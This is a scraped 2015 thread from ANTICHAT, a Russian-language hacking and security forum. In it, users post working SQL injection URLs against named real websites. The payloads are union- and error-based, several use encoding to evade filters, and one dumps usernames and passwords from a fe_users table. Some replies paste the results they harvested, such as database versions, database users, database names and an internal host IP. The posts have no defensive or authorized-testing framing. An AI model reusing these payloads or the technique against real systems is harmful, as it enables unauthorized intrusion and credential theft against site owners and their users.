ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

19.05.2015, 00:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#[/COLOR][/COLOR]
Код HTML:
HTML:
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database(),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#[/COLOR][/COLOR]
этот error-base?
//можно крутить и как error и как union
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45%4c%65%63%74 1,2,database(),4,5/**/'1#[/COLOR][/COLOR]
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where [/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]0x696e666f726d6174696f6e5f736368656d61[/COLOR][COLOR="#007700"]) and (@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]in[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:=[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3c6c693e[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"], [/COLOR][COLOR="#0000BB"]0x203a3a20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x203a3a20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3c62723e[/COLOR][COLOR="#007700"]))))[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]#[/COLOR][/COLOR]
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f database()},4,5,user(),7,8#[/COLOR][/COLOR]
Спасибо парню, за статью))
Господа, я потом обединю в один пост , не ругайтесь
|
|
|
|

19.05.2015, 13:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 35015
Репутация:
57
|
|
Код:
Code:
http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a653d22352220636f6c6f723d2272656422203e7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e3c68723e,0x4461746142617365203a3a,database(),0x3c62723e56457273696f4e203a3a,version(),
0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e743e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -
|
|
|
|

19.05.2015, 19:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 7357
Репутация:
7
|
|
Сообщение от BabaDook
BabaDook said:
↑
Код HTML:
HTML:
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((
Код HTML:
HTML:
http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29,user%28%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
это error-base
|
|
|
|

19.05.2015, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
|
|
|
|

20.05.2015, 02:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 1814
Репутация:
8
|
|
Код:
Code:
http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27
|
|
|
|

20.05.2015, 02:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 25535
Репутация:
22
|
|
|
|
|
|

20.05.2015, 11:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 31545
Репутация:
6
|
|
5.5.29-0ubuntu0.12.04.1
childensgarden@localhost
childrensgarden_dk
5.5.42-37.1-log
Sql533637@62.149.130.42
Sql533637_1
|
|
|
|

20.05.2015, 13:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 9828
Репутация:
3
|
|
Сообщение от BabaDook
BabaDook said:
↑
dsn: 'mysql:host=localhos -Если я не ошибаюсь, то это ключевая строка
Суть вопроса была не в этом.
Код:
Code:
http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+
5.1.73-2+squeeze+build1+1-log
abrasifsbase
abrasifsbase@10.0.65.161
|
|
|
|

21.05.2015, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 506
Репутация:
1
|
|
|
|
|
|

21.05.2015, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 506
Репутация:
1
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|